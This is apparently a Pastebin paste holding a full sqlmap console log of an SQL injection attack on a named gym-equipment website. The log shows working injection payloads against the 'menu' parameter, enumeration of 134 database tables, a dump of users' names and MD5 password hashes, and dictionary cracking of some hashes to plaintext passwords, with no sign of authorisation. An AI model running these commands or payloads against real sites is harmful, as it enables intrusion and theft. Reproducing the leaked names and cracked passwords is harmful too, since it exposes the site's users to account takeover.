API tools faq
paste
Advertisement
Netikerty

Another scan with Sqlmap

Netikerty
Feb 23rd, 2013
211
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 29.04 KB | None | 0 0
raw download clone embed print report diff
  1. root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.gymstick.net/index.php?menu=13 --random-agent --dbs
  2.  
  3. root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.gymstick.net/index.php?menu=13 --random-agent -D gymsticknet --tables
  4.  
  5. sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
  6. http://sqlmap.org
  7.  
  8. [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
  9.  
  10. [*] starting at 22:14:54
  11.  
  12. [22:14:54] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Opera/9.52 (X11; Linux x86_64; U; en)
  13. [22:14:55] [INFO] resuming back-end DBMS 'mysql'
  14. [22:15:03] [INFO] testing connection to the target url
  15. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  16. ---
  17. Place: GET
  18. Parameter: menu
  19. Type: boolean-based blind
  20. Title: AND boolean-based blind - WHERE or HAVING clause
  21. Payload: menu=13' AND 9941=9941 AND 'PLXk'='PLXk
  22.  
  23. Type: error-based
  24. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  25. Payload: menu=13' AND (SELECT 8778 FROM(SELECT COUNT(*),CONCAT(0x3a7174753a,(SELECT (CASE WHEN (8778=8778) THEN 1 ELSE 0 END)),0x3a6f687a3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'EcaG'='EcaG
  26.  
  27. Type: AND/OR time-based blind
  28. Title: MySQL > 5.0.11 AND time-based blind
  29. Payload: menu=13' AND SLEEP(5) AND 'nibs'='nibs
  30. ---
  31.  
  32. [22:15:10] [INFO] the back-end DBMS is MySQL
  33.  
  34. web application technology: PHP 5.2.6, Apache
  35. back-end DBMS: MySQL 5.0
  36. [22:15:10] [INFO] fetching tables for database: 'gymsticknet'
  37. [22:15:23] [INFO] heuristics detected web page charset 'ascii'
  38. [22:15:23] [INFO] the SQL query used returns 134 entries
  39. [22:15:24] [INFO] retrieved: afb_accounts
  40. [22:15:24] [INFO] retrieved: afb_accounts_has_perms
  41. [22:15:25] [INFO] retrieved: afb_blacklist_dirs
  42. [22:15:25] [INFO] retrieved: afb_blacklist_ext
  43. [22:15:26] [INFO] retrieved: afb_blacklist_files
  44. [22:15:26] [INFO] retrieved: afb_log
  45. [22:15:27] [INFO] retrieved: afb_settings
  46. [22:15:28] [INFO] retrieved: afb_shares
  47. [22:15:28] [INFO] retrieved: bh2_aclgroups
  48. [22:15:30] [INFO] retrieved: bh2_aclpublic
  49. [22:15:31] [INFO] retrieved: bh2_aclusers
  50. [22:15:31] [INFO] retrieved: bh2_adminmodulesmenu
  51. [22:15:32] [INFO] retrieved: bh2_bandwidth
  52. [22:15:32] [INFO] retrieved: bh2_config
  53. [22:15:34] [INFO] retrieved: bh2_filecodereminders
  54. [22:15:34] [INFO] retrieved: bh2_filecodes
  55. [22:15:35] [INFO] retrieved: bh2_groupusers
  56. [22:15:36] [INFO] retrieved: bh2_log
  57. [22:15:36] [INFO] retrieved: bh2_logactions
  58. [22:15:37] [INFO] retrieved: bh2_metadata
  59. [22:15:39] [INFO] retrieved: bh2_modules
  60. [22:15:39] [INFO] retrieved: bh2_modulesaccesslevel
  61. [22:15:40] [INFO] retrieved: bh2_modulesdirectory
  62. [22:15:40] [INFO] retrieved: bh2_modulesfiletype
  63. [22:15:41] [INFO] retrieved: bh2_modulesmenu
  64. [22:15:42] [INFO] retrieved: bh2_modulesusertype
  65. [22:15:43] [INFO] retrieved: bh2_packages
  66. [22:15:43] [INFO] retrieved: bh2_passwordresets
  67. [22:15:45] [INFO] retrieved: bh2_registrations
  68. [22:15:46] [INFO] retrieved: bh2_satellitetransfers
  69. [22:15:46] [INFO] retrieved: bh2_texts
  70. [22:15:47] [INFO] retrieved: bh2_uploads
  71. [22:15:48] [INFO] retrieved: bh2_userinfo
  72. [22:15:50] [INFO] retrieved: bh2_users
  73. [22:15:51] [INFO] retrieved: bh2_usersviews
  74. [22:15:53] [INFO] retrieved: contacts
  75. [22:15:55] [INFO] retrieved: countries
  76. [22:15:57] [INFO] retrieved: downloads_agreements
  77. [22:15:59] [INFO] retrieved: downloads_categories
  78. [22:16:00] [INFO] retrieved: downloads_comments
  79. [22:16:02] [INFO] retrieved: downloads_config
  80. [22:16:04] [INFO] retrieved: downloads_customfields
  81. [22:16:06] [INFO] retrieved: downloads_customfields_data
  82. [22:16:07] [INFO] retrieved: downloads_files
  83. [22:16:09] [INFO] retrieved: downloads_ip_restrict
  84. [22:16:10] [INFO] retrieved: downloads_ip_restrict_log
  85. [22:16:10] [INFO] retrieved: downloads_languages
  86. [22:16:11] [INFO] retrieved: downloads_leech_settings
  87. [22:16:12] [INFO] retrieved: downloads_mirrors
  88. [22:16:12] [INFO] retrieved: downloads_permissions
  89. [22:16:13] [INFO] retrieved: downloads_recommend_blocklist
  90. [22:16:13] [INFO] retrieved: downloads_recommend_log
  91. [22:16:14] [INFO] retrieved: downloads_stats
  92. [22:16:14] [INFO] retrieved: downloads_usergroups
  93. [22:16:15] [INFO] retrieved: downloads_userpermissions
  94. [22:16:16] [INFO] retrieved: downloads_users
  95. [22:16:16] [INFO] retrieved: files
  96. [22:16:17] [INFO] retrieved: folders
  97. [22:16:17] [INFO] retrieved: intrausers
  98. [22:16:18] [INFO] retrieved: ipfm_groups
  99. [22:16:19] [INFO] retrieved: ipfm_reg_antispam
  100. [22:16:19] [INFO] retrieved: ipfm_validating
  101. [22:16:20] [INFO] retrieved: menu
  102. [22:16:21] [INFO] retrieved: pages
  103. [22:16:21] [INFO] retrieved: pfn_accesos
  104. [22:16:22] [INFO] retrieved: pfn_arquivos
  105. [22:16:22] [INFO] retrieved: pfn_arquivos_campos_palabras
  106. [22:16:23] [INFO] retrieved: pfn_bloqueo_ip
  107. [22:16:23] [INFO] retrieved: pfn_campos
  108. [22:16:24] [INFO] retrieved: pfn_configuracions
  109. [22:16:25] [INFO] retrieved: pfn_configuracions_datos
  110. [22:16:25] [INFO] retrieved: pfn_directorios
  111. [22:16:26] [INFO] retrieved: pfn_grupos
  112. [22:16:26] [INFO] retrieved: pfn_palabras
  113. [22:16:27] [INFO] retrieved: pfn_raices
  114. [22:16:27] [INFO] retrieved: pfn_raices_grupos_configuracions
  115. [22:16:28] [INFO] retrieved: pfn_raices_usuarios
  116. [22:16:29] [INFO] retrieved: pfn_sesions
  117. [22:16:29] [INFO] retrieved: pfn_usuarios
  118. [22:16:30] [INFO] retrieved: phpwebgallery_caddie
  119. [22:16:31] [INFO] retrieved: phpwebgallery_categories
  120. [22:16:31] [INFO] retrieved: phpwebgallery_comments
  121. [22:16:32] [INFO] retrieved: phpwebgallery_config
  122. [22:16:32] [INFO] retrieved: phpwebgallery_download_multi
  123. [22:16:33] [INFO] retrieved: phpwebgallery_favorites
  124. [22:16:34] [INFO] retrieved: phpwebgallery_group_access
  125. [22:16:36] [INFO] retrieved: phpwebgallery_groups
  126. [22:16:36] [INFO] retrieved: phpwebgallery_history
  127. [22:16:37] [INFO] retrieved: phpwebgallery_history_summary
  128. [22:16:38] [INFO] retrieved: phpwebgallery_image_category
  129. [22:16:38] [INFO] retrieved: phpwebgallery_image_tag
  130. [22:16:39] [INFO] retrieved: phpwebgallery_images
  131. [22:16:39] [INFO] retrieved: phpwebgallery_old_permalinks
  132. [22:16:40] [INFO] retrieved: phpwebgallery_plugins
  133. [22:16:41] [INFO] retrieved: phpwebgallery_rate
  134. [22:16:41] [INFO] retrieved: phpwebgallery_search
  135. [22:16:42] [INFO] retrieved: phpwebgallery_sessions
  136. [22:16:42] [INFO] retrieved: phpwebgallery_sites
  137. [22:16:43] [INFO] retrieved: phpwebgallery_tags
  138. [22:16:43] [INFO] retrieved: phpwebgallery_upgrade
  139. [22:16:44] [INFO] retrieved: phpwebgallery_user_access
  140. [22:16:45] [INFO] retrieved: phpwebgallery_user_cache
  141. [22:16:45] [INFO] retrieved: phpwebgallery_user_cache_categories
  142. [22:16:46] [INFO] retrieved: phpwebgallery_user_feed
  143. [22:16:47] [INFO] retrieved: phpwebgallery_user_group
  144. [22:16:47] [INFO] retrieved: phpwebgallery_user_infos
  145. [22:16:48] [INFO] retrieved: phpwebgallery_user_mail_notification
  146. [22:16:48] [INFO] retrieved: phpwebgallery_users
  147. [22:16:49] [INFO] retrieved: phpwebgallery_waiting
  148. [22:16:53] [INFO] retrieved: phpwebgallery_ws_access
  149. [22:16:54] [INFO] retrieved: relay_clients
  150. [22:16:54] [INFO] retrieved: relay_filesystem
  151. [22:16:55] [INFO] retrieved: relay_log
  152. [22:16:56] [INFO] retrieved: relay_permissions
  153. [22:16:57] [INFO] retrieved: relay_users
  154. [22:16:58] [INFO] retrieved: spages
  155. [22:16:58] [INFO] retrieved: submenu
  156. [22:16:59] [INFO] retrieved: tc_acp_label_states
  157. [22:17:00] [INFO] retrieved: tc_admin_cp_false_logins
  158. [22:17:01] [INFO] retrieved: tc_banned_ips
  159. [22:17:01] [INFO] retrieved: tc_error_log
  160. [22:17:02] [INFO] retrieved: tc_forum_integration
  161. [22:17:03] [INFO] retrieved: tc_installed_plugins
  162. [22:17:03] [INFO] retrieved: tc_membergroups
  163. [22:17:04] [INFO] retrieved: tc_members
  164. [22:17:05] [INFO] retrieved: tc_menu
  165. [22:17:05] [INFO] retrieved: tc_pages
  166. [22:17:06] [INFO] retrieved: tc_plugin_lists
  167. [22:17:06] [INFO] retrieved: tc_plugins
  168. [22:17:07] [INFO] retrieved: tc_sessions
  169. [22:17:07] [INFO] retrieved: tc_settings
  170. [22:17:08] [INFO] retrieved: tc_statistics_visitors
  171. [22:17:09] [INFO] retrieved: test
  172. [22:17:09] [INFO] retrieved: users
  173. Database: gymsticknet
  174. [134 tables]
  175. +--------------------------------------+
  176. | afb_accounts |
  177. | afb_accounts_has_perms |
  178. | afb_blacklist_dirs |
  179. | afb_blacklist_ext |
  180. | afb_blacklist_files |
  181. | afb_log |
  182. | afb_settings |
  183. | afb_shares |
  184. | bh2_aclgroups |
  185. | bh2_aclpublic |
  186. | bh2_aclusers |
  187. | bh2_adminmodulesmenu |
  188. | bh2_bandwidth |
  189. | bh2_config |
  190. | bh2_filecodereminders |
  191. | bh2_filecodes |
  192. | bh2_groupusers |
  193. | bh2_log |
  194. | bh2_logactions |
  195. | bh2_metadata |
  196. | bh2_modules |
  197. | bh2_modulesaccesslevel |
  198. | bh2_modulesdirectory |
  199. | bh2_modulesfiletype |
  200. | bh2_modulesmenu |
  201. | bh2_modulesusertype |
  202. | bh2_packages |
  203. | bh2_passwordresets |
  204. | bh2_registrations |
  205. | bh2_satellitetransfers |
  206. | bh2_texts |
  207. | bh2_uploads |
  208. | bh2_userinfo |
  209. | bh2_users |
  210. | bh2_usersviews |
  211. | contacts |
  212. | countries |
  213. | downloads_agreements |
  214. | downloads_categories |
  215. | downloads_comments |
  216. | downloads_config |
  217. | downloads_customfields |
  218. | downloads_customfields_data |
  219. | downloads_files |
  220. | downloads_ip_restrict |
  221. | downloads_ip_restrict_log |
  222. | downloads_languages |
  223. | downloads_leech_settings |
  224. | downloads_mirrors |
  225. | downloads_permissions |
  226. | downloads_recommend_blocklist |
  227. | downloads_recommend_log |
  228. | downloads_stats |
  229. | downloads_usergroups |
  230. | downloads_userpermissions |
  231. | downloads_users |
  232. | files |
  233. | folders |
  234. | intrausers |
  235. | ipfm_groups |
  236. | ipfm_reg_antispam |
  237. | ipfm_validating |
  238. | menu |
  239. | pages |
  240. | pfn_accesos |
  241. | pfn_arquivos |
  242. | pfn_arquivos_campos_palabras |
  243. | pfn_bloqueo_ip |
  244. | pfn_campos |
  245. | pfn_configuracions |
  246. | pfn_configuracions_datos |
  247. | pfn_directorios |
  248. | pfn_grupos |
  249. | pfn_palabras |
  250. | pfn_raices |
  251. | pfn_raices_grupos_configuracions |
  252. | pfn_raices_usuarios |
  253. | pfn_sesions |
  254. | pfn_usuarios |
  255. | phpwebgallery_caddie |
  256. | phpwebgallery_categories |
  257. | phpwebgallery_comments |
  258. | phpwebgallery_config |
  259. | phpwebgallery_download_multi |
  260. | phpwebgallery_favorites |
  261. | phpwebgallery_group_access |
  262. | phpwebgallery_groups |
  263. | phpwebgallery_history |
  264. | phpwebgallery_history_summary |
  265. | phpwebgallery_image_category |
  266. | phpwebgallery_image_tag |
  267. | phpwebgallery_images |
  268. | phpwebgallery_old_permalinks |
  269. | phpwebgallery_plugins |
  270. | phpwebgallery_rate |
  271. | phpwebgallery_search |
  272. | phpwebgallery_sessions |
  273. | phpwebgallery_sites |
  274. | phpwebgallery_tags |
  275. | phpwebgallery_upgrade |
  276. | phpwebgallery_user_access |
  277. | phpwebgallery_user_cache |
  278. | phpwebgallery_user_cache_categories |
  279. | phpwebgallery_user_feed |
  280. | phpwebgallery_user_group |
  281. | phpwebgallery_user_infos |
  282. | phpwebgallery_user_mail_notification |
  283. | phpwebgallery_users |
  284. | phpwebgallery_waiting |
  285. | phpwebgallery_ws_access |
  286. | relay_clients |
  287. | relay_filesystem |
  288. | relay_log |
  289. | relay_permissions |
  290. | relay_users |
  291. | spages |
  292. | submenu |
  293. | tc_acp_label_states |
  294. | tc_admin_cp_false_logins |
  295. | tc_banned_ips |
  296. | tc_error_log |
  297. | tc_forum_integration |
  298. | tc_installed_plugins |
  299. | tc_membergroups |
  300. | tc_members |
  301. | tc_menu |
  302. | tc_pages |
  303. | tc_plugin_lists |
  304. | tc_plugins |
  305. | tc_sessions |
  306. | tc_settings |
  307. | tc_statistics_visitors |
  308. | test |
  309. | users |
  310. +--------------------------------------+
  311.  
  312. [22:17:10] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.gymstick.net'
  313.  
  314. [*] shutting down at 22:17:10
  315.  
  316. root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.gymstick.net/index.php?menu=13 --random-agent -D gymsticknet -T users --columns
  317.  
  318. sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
  319. http://sqlmap.org
  320.  
  321. [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
  322.  
  323. [*] starting at 22:21:35
  324.  
  325. [22:21:35] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Mozilla/5.0 (Windows NT 5.1; U; ; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.52
  326. [22:21:36] [INFO] resuming back-end DBMS 'mysql'
  327. [22:21:37] [INFO] testing connection to the target url
  328. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  329. ---
  330. Place: GET
  331. Parameter: menu
  332. Type: boolean-based blind
  333. Title: AND boolean-based blind - WHERE or HAVING clause
  334. Payload: menu=13' AND 9941=9941 AND 'PLXk'='PLXk
  335.  
  336. Type: error-based
  337. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  338. Payload: menu=13' AND (SELECT 8778 FROM(SELECT COUNT(*),CONCAT(0x3a7174753a,(SELECT (CASE WHEN (8778=8778) THEN 1 ELSE 0 END)),0x3a6f687a3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'EcaG'='EcaG
  339.  
  340. Type: AND/OR time-based blind
  341. Title: MySQL > 5.0.11 AND time-based blind
  342. Payload: menu=13' AND SLEEP(5) AND 'nibs'='nibs
  343. ---
  344.  
  345. [22:21:38] [INFO] the back-end DBMS is MySQL
  346.  
  347. web application technology: PHP 5.2.6, Apache
  348. back-end DBMS: MySQL 5.0
  349. [22:21:38] [INFO] fetching columns for table 'users' in database 'gymsticknet'
  350. [22:21:39] [INFO] heuristics detected web page charset 'ascii'
  351. [22:21:39] [INFO] the SQL query used returns 5 entries
  352. [22:21:40] [INFO] retrieved: id
  353. [22:21:40] [INFO] retrieved: int(11)
  354. [22:21:41] [INFO] retrieved: name
  355. [22:21:42] [INFO] retrieved: varchar(255)
  356. [22:21:42] [INFO] retrieved: username
  357. [22:21:43] [INFO] retrieved: varchar(255)
  358. [22:21:43] [INFO] retrieved: password
  359. [22:21:44] [INFO] retrieved: varchar(255)
  360. [22:21:44] [INFO] retrieved: super
  361. [22:21:45] [INFO] retrieved: tinyint(1)
  362. Database: gymsticknet
  363. Table: users
  364. [5 columns]
  365. +----------+--------------+
  366. | Column | Type |
  367. +----------+--------------+
  368. | id | int(11) |
  369. | name | varchar(255) |
  370. | password | varchar(255) |
  371. | super | tinyint(1) |
  372. | username | varchar(255) |
  373. +----------+--------------+
  374.  
  375. [22:21:45] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.gymstick.net'
  376.  
  377. [*] shutting down at 22:21:45
  378.  
  379. root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.gymstick.net/index.php?menu=13 --random-agent -D gymsticknet -T users -C name --dump
  380.  
  381. sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
  382. http://sqlmap.org
  383.  
  384. [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
  385.  
  386. [*] starting at 22:24:37
  387.  
  388. [22:24:37] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19
  389. [22:24:38] [INFO] resuming back-end DBMS 'mysql'
  390. [22:24:40] [INFO] testing connection to the target url
  391. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  392. ---
  393. Place: GET
  394. Parameter: menu
  395. Type: boolean-based blind
  396. Title: AND boolean-based blind - WHERE or HAVING clause
  397. Payload: menu=13' AND 9941=9941 AND 'PLXk'='PLXk
  398.  
  399. Type: error-based
  400. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  401. Payload: menu=13' AND (SELECT 8778 FROM(SELECT COUNT(*),CONCAT(0x3a7174753a,(SELECT (CASE WHEN (8778=8778) THEN 1 ELSE 0 END)),0x3a6f687a3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'EcaG'='EcaG
  402.  
  403. Type: AND/OR time-based blind
  404. Title: MySQL > 5.0.11 AND time-based blind
  405. Payload: menu=13' AND SLEEP(5) AND 'nibs'='nibs
  406. ---
  407.  
  408. [22:24:43] [INFO] the back-end DBMS is MySQL
  409.  
  410. web application technology: PHP 5.2.6, Apache
  411. back-end DBMS: MySQL 5.0
  412. do you want sqlmap to consider provided column(s):
  413. [1] as LIKE column names (default)
  414. [2] as exact column names
  415. > 2
  416.  
  417. [22:24:47] [INFO] fetching columns 'name' for table 'users' in database 'gymsticknet'
  418. [22:24:47] [INFO] heuristics detected web page charset 'ascii'
  419. [22:24:48] [INFO] the SQL query used returns 1 entries
  420. [22:24:48] [INFO] retrieved: name
  421. [22:24:49] [INFO] retrieved: varchar(255)
  422. [22:24:49] [INFO] fetching entries of column(s) 'name' for table 'users' in database 'gymsticknet'
  423. [22:24:49] [INFO] the SQL query used returns 4 entries
  424. [22:24:50] [INFO] retrieved: antti mikkola
  425. [22:24:51] [INFO] retrieved: juha hoo
  426. [22:24:51] [INFO] retrieved: keijo pesonen
  427. [22:24:52] [INFO] retrieved: testikayttaja
  428. [22:24:52] [INFO] analyzing table dump for possible password hashes
  429. Database: gymsticknet
  430. Table: users
  431. [4 entries]
  432. +---------------+
  433. | name |
  434. +---------------+
  435. | antti mikkola |
  436. | juha hoo |
  437. | keijo pesonen |
  438. | testikayttaja |
  439. +---------------+
  440.  
  441. [22:24:52] [INFO] table 'gymsticknet.users' dumped to CSV file '/pentest/database/sqlmap/output/www.gymstick.net/dump/gymsticknet/users.csv'
  442. [22:24:52] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.gymstick.net'
  443.  
  444. [*] shutting down at 22:24:52
  445.  
  446. root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.gymstick.net/index.php?menu=13 --random-agent -D gymsticknet -T users -C password --dump
  447.  
  448. sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
  449. http://sqlmap.org
  450.  
  451. [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
  452.  
  453. [*] starting at 22:25:42
  454.  
  455. [22:25:42] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.2 Safari/530.5
  456. [22:25:42] [INFO] resuming back-end DBMS 'mysql'
  457. [22:25:43] [INFO] testing connection to the target url
  458. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  459. ---
  460. Place: GET
  461. Parameter: menu
  462. Type: boolean-based blind
  463. Title: AND boolean-based blind - WHERE or HAVING clause
  464. Payload: menu=13' AND 9941=9941 AND 'PLXk'='PLXk
  465.  
  466. Type: error-based
  467. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  468. Payload: menu=13' AND (SELECT 8778 FROM(SELECT COUNT(*),CONCAT(0x3a7174753a,(SELECT (CASE WHEN (8778=8778) THEN 1 ELSE 0 END)),0x3a6f687a3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'EcaG'='EcaG
  469.  
  470. Type: AND/OR time-based blind
  471. Title: MySQL > 5.0.11 AND time-based blind
  472. Payload: menu=13' AND SLEEP(5) AND 'nibs'='nibs
  473. ---
  474.  
  475. [22:25:45] [INFO] the back-end DBMS is MySQL
  476.  
  477. web application technology: PHP 5.2.6, Apache
  478. back-end DBMS: MySQL 5.0
  479. do you want sqlmap to consider provided column(s):
  480. [1] as LIKE column names (default)
  481. [2] as exact column names
  482. > 2
  483.  
  484. [22:25:49] [INFO] fetching columns 'password' for table 'users' in database 'gymsticknet'
  485. [22:25:50] [INFO] heuristics detected web page charset 'ascii'
  486. [22:25:50] [INFO] the SQL query used returns 1 entries
  487. [22:25:51] [INFO] retrieved: password
  488. [22:25:51] [INFO] retrieved: varchar(255)
  489. [22:25:52] [INFO] fetching entries of column(s) 'password' for table 'users' in database 'gymsticknet'
  490. [22:25:52] [INFO] the SQL query used returns 4 entries
  491. [22:25:52] [INFO] retrieved: 8d68c0d987f302d0fe6de347245b5587
  492. [22:25:53] [INFO] retrieved: 9627df7a4a5b849f67fce863e82adc71
  493. [22:25:53] [INFO] retrieved: db2fa9922825f59757dd5fcb5d8e1f2b
  494. [22:25:54] [INFO] retrieved: db2fa9922825f59757dd5fcb5d8e1f2b
  495. [22:25:54] [INFO] analyzing table dump for possible password hashes
  496. recognized possible password hashes in column 'password'. Do you want to crack them via a dictionary-based attack? [Y/n/q] y
  497.  
  498. [22:26:03] [INFO] using hash method 'md5_generic_passwd'
  499. what dictionary do you want to use?
  500. [1] default dictionary file '/pentest/database/sqlmap/txt/wordlist.txt' (press Enter)
  501. [2] custom dictionary file
  502. [3] file with list of dictionary files
  503. > 1
  504.  
  505. [22:26:23] [INFO] using default dictionary
  506. [22:26:23] [INFO] loading dictionary from '/pentest/database/sqlmap/txt/wordlist.txt'
  507. do you want to use common password suffixes? (slow!) [y/N] y
  508.  
  509. [22:26:32] [INFO] starting dictionary-based cracking (md5_generic_passwd)
  510. [22:26:32] [INFO] starting 2 processes
  511. [22:27:08] [INFO] cracked password 'testi' for hash '9627df7a4a5b849f67fce863e82adc71'
  512. [22:27:11] [INFO] using suffix '1'
  513. [22:27:40] [INFO] cracked password 'molo1' for hash 'db2fa9922825f59757dd5fcb5d8e1f2b'
  514. [22:27:54] [INFO] using suffix '123'
  515. [22:28:35] [INFO] using suffix '2'
  516. [22:29:17] [INFO] using suffix '12'
  517. [22:29:55] [INFO] using suffix '3'
  518. [22:30:34] [INFO] using suffix '13'
  519. [22:31:12] [INFO] using suffix '7'
  520. [22:31:57] [INFO] using suffix '11'
  521. [22:32:34] [INFO] using suffix '5'
  522. [22:33:23] [INFO] using suffix '22'
  523. [22:34:00] [INFO] using suffix '23'
  524. [22:34:41] [INFO] using suffix '01'
  525. [22:35:36] [INFO] using suffix '4'
  526. [22:36:28] [INFO] using suffix '07'
  527. [22:37:06] [INFO] using suffix '21'
  528. [22:37:44] [INFO] using suffix '14'
  529. [22:38:27] [INFO] using suffix '10'
  530. [22:39:07] [INFO] using suffix '06'
  531. [22:39:42] [INFO] using suffix '08'
  532. [22:40:20] [INFO] using suffix '8'
  533. [22:40:58] [INFO] using suffix '15'
  534. [22:41:38] [INFO] using suffix '69'
  535. [22:42:17] [INFO] using suffix '16'
  536. [22:42:52] [INFO] using suffix '6'
  537. [22:43:27] [INFO] using suffix '18'
  538. [22:44:06] [INFO] using suffix '!'
  539. [22:44:44] [INFO] using suffix '.'
  540. [22:45:21] [INFO] using suffix '*'
  541. [22:45:58] [INFO] using suffix '!!'
  542. [22:46:32] [INFO] using suffix '?'
  543. [22:47:13] [INFO] using suffix ';'
  544. [22:47:49] [INFO] using suffix '..'
  545. [22:48:32] [INFO] using suffix '!!!'
  546. [22:49:17] [INFO] using suffix ','
  547. [22:49:54] [INFO] using suffix '@'
  548. [22:50:33] [INFO] writing uncracked hashes to file '/tmp/tmpzshPZE.txt' for eventual further processing
  549. [22:50:33] [INFO] postprocessing table dump
  550. Database: gymsticknet
  551. Table: users
  552. [4 entries]
  553. +------------------------------------------+
  554. | password |
  555. +------------------------------------------+
  556. | 8d68c0d987f302d0fe6de347245b5587 |
  557. | 9627df7a4a5b849f67fce863e82adc71 (testi) |
  558. | db2fa9922825f59757dd5fcb5d8e1f2b (molo1) |
  559. | db2fa9922825f59757dd5fcb5d8e1f2b (molo1) |
  560. +------------------------------------------+
  561.  
  562. [22:50:33] [INFO] table 'gymsticknet.users' dumped to CSV file '/pentest/database/sqlmap/output/www.gymstick.net/dump/gymsticknet/users.csv'
  563. [22:50:33] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.gymstick.net'
  564.  
  565. [*] shutting down at 22:50:33
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!